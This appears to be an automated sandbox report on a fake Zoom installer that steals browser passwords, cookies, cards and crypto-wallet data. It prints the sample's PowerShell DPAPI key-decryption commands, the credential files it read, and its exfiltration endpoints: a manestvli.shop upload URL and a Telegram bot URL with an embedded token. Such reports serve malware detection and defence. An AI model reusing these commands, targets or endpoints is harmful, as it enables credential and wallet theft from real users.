[system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, [system.security.cryptography.dataprotectionscope]::currentuser); $decryptedkeystring = [system.bitconverter]::tostring($decryptedkey) -replace '-', ''; write-output $decryptedkeystring"
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " add-type -assemblyname \"system.security\"; $decryptedkey = [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, [system.security.cryptography.dataprotectionscope]::currentuser); $decryptedkeystring = [system.bitconverter]::tostring($decryptedkey) -replace '-', ''; write-output $decryptedkeystring"
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Documents VolumeInformation
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Documents\BPMLNOBVSB VolumeInformation
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Documents\FENIVHOIKN VolumeInformation
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Documents\My Music VolumeInformation
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Documents\My Videos VolumeInformation
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Documents\UMMBDNEQBN VolumeInformation
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Documents\WUTJSCBCFX VolumeInformation
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Desktop\FENIVHOIKN VolumeInformation
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Desktop\NWTVCDUMOB VolumeInformation
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ VolumeInformation
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Desktop\WUTJSCBCFX VolumeInformation
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Downloads VolumeInformation
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile VolumeInformation
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\Autofills VolumeInformation
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\Cards VolumeInformation
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\Cookies VolumeInformation
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\History VolumeInformation
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\Passwords VolumeInformation
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\Wallets VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
    Source: C:\Users\user\Desktop\ZoomInstaller.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Stealing of Sensitive Information

    barindex
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File created: C:\Users\user\AppData\Local\Ailurophile\Cards\Cards.txt
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File created: C:\Users\user\AppData\Local\Ailurophile\Autofills\Autofills.txt
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File created: C:\Users\user\AppData\Local\Ailurophile\Cookies\Google_Default.txt
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.db
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ocglkepbibnalbgmbachknglpdipeoio
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\Cookies
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Neon\User Data\Default\Network\Cookies
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web.db
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcbigmjiafegjnnogedioegffbooigli
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\Cookies
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibg
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\Cookies
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\history.db
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkib
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\khpkpbbcccdmmclmpigdgddabeilkdpd
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\odbfpeeihdkbihmopkbjmoonfanlbfcl
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mdjmfdffdcmnoblignmgpommbefadffd
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\djclckkglechooblngghdinmeemkbgci
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\history.db
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\akoiaibnepcedcplijmiamnaigbepmcb
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | Directory queried: C:\Users\user\Documents
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | Directory queried: C:\Users\user\Documents\BPMLNOBVSB
    Source: C:\Users\user\Desktop\ZoomInstaller.exe | Directory queried: C:\Users\user\Documents\UMMBDNEQBN
    Source: Yara match | File source: Process Memory Space: ZoomInstaller.exe PID: 7284, type: MEMORYSTR
    MITRE ATT&CK Matrix

    The matrix is listed per tactic (column); a number in front of a technique is the count of matched signatures.

    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
    Execution: 1 Windows Management Instrumentation; 12 Command and Scripting Interpreter; At; Cron; Launchd; Scheduled Task; Systemd Timers
    Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
    Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
    Defense Evasion: 1 Masquerading; 1 Modify Registry; 21 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Obfuscated Files or Information; 1 Install Root Certificate; 1 DLL Side-Loading
    Credential Access: 1 OS Credential Dumping; 11 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
    Discovery: 1 Query Registry; 11 Security Software Discovery; 2 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 13 System Information Discovery
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
    Collection: 11 Input Capture; 21 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
    Command and Control: 1 Web Service; 11 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Multiband Communication; Commonly Used Port
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    Behavior Graph
    ID: 1544493 | Sample: ZoomInstaller.exe | Startdate: 29/10/2024 | Architecture: WINDOWS | Score: 76

    Start node
    DNS/IP: api.telegram.org; manestvli.shop; api.myip.com
    Signatures: Suricata IDS alerts for network traffic; Machine Learning detection for sample; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); AI detected suspicious sample
    Signature attached to api.telegram.org: Uses the Telegram API (likely for C&C communication)
    Process started: ZoomInstaller.exe (25)

    ZoomInstaller.exe (25)
    DNS/IP: api.telegram.org 149.154.167.220, 443, 49738, TELEGRAMRU, United Kingdom
    DNS/IP: manestvli.shop 188.114.97.3, 443, 49737, CLOUDFLARENETUS, European Union
    DNS/IP: api.myip.com 104.26.9.59, 443, 49730, CLOUDFLARENETUS, United States
    Dropped files: C:\Users\user\AppData\Local\...\history.db, SQLite; C:\Users\user\AppData\Local\...\webdata.db, SQLite; C:\Users\user\AppData\Local\...\passwords.db, SQLite; 5 other malicious files
    Signatures: Installs new ROOT certificates; Tries to harvest and steal browser information (history, passwords, etc); Detected generic credential text file
    Processes started: powershell.exe (15); powershell.exe (15); powershell.exe (11); 6 other processes

    Child processes
    powershell.exe (15) started conhost.exe
    powershell.exe (15) started conhost.exe
    powershell.exe (11) started conhost.exe
    6 other processes started conhost.exe, conhost.exe, conhost.exe and 3 other processes

    Source | Detection | Scanner | Label | Link
    ZoomInstaller.exe | 0% | ReversingLabs
    ZoomInstaller.exe | 100% | Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label | Link
    https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
    http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
    https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
    http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
    https://go.micro | 0% | URL Reputation | safe
    https://contoso.com/License | 0% | URL Reputation | safe
    https://contoso.com/Icon | 0% | URL Reputation | safe
    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | 0% | URL Reputation | safe
    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | 0% | URL Reputation | safe
    https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
    https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | 0% | URL Reputation | safe
    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
    https://contoso.com/ | 0% | URL Reputation | safe
    https://nuget.org/nuget.exe | 0% | URL Reputation | safe
    https://oneget.orgX | 0% | URL Reputation | safe
    https://aka.ms/pscore68 | 0% | URL Reputation | safe
    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | 0% | URL Reputation | safe
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
    https://oneget.org | 0% | URL Reputation | safe
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    api.myip.com | 104.26.9.59 | true | false | | unknown
    manestvli.shop | 188.114.97.3 | true | true | | unknown
    api.telegram.org | 149.154.167.220 | true | true | | unknown
    Name | Malicious | Antivirus Detection | Reputation
    https://api.myip.com/ | false | | unknown
    https://api.telegram.org/bot7576282251:AAG0mg-rIFL8SDgfm15Nk4l51UZeLB-cEwU/sendMessage | false | | unknown
    https://manestvli.shop/upload.php?data=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&hash=2d6441c1bfc749b0344f | true | | unknown
    Name | Source | Malicious | Antivirus Detection | Reputation
    https://duckduckgo.com/chrome_newtab | ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | false | URL Reputation: safe | unknown
    http://nuget.org/NuGet.exe | powershell.exe, 0000000F.00000002.1834759671.0000025648BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1815118814.000002563A346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1834759671.0000025648A74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FD40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 0000000F.00000002.1815118814.000002563A0FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405FA0A000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
    https://api.myip.com | ZoomInstaller.exe, 00000000.00000002.1975879577.000000C000102000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
    https://duckduckgo.com/ac/?q= | ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | false | URL Reputation: safe | unknown
    https://www.google.com/images/branding/product/ico/googleg_lodp.ico | ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00022C000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.1975879577.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | false | | unknown
    http://pesterbdd.com/images/Pester.png | powershell.exe, 00000011.00000002.1863827318.000001405FBCA000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000011.00000002.1863827318.000001405FBCA000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
    https://go.micro | powershell.exe, 0000000F.00000002.1815118814.0000025639633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1863827318.000001405EF42000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://contoso.com/License | powershell.exe, 00000011.00000002.1922620665.000001406E4C7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
    https://manestvli.shop/upload.php? | ZoomInstaller.exe, 00000000.00000002.1975879577.000000C00032A000.00000004.00001000.00020000.00000000.sdmp | false | | unknown
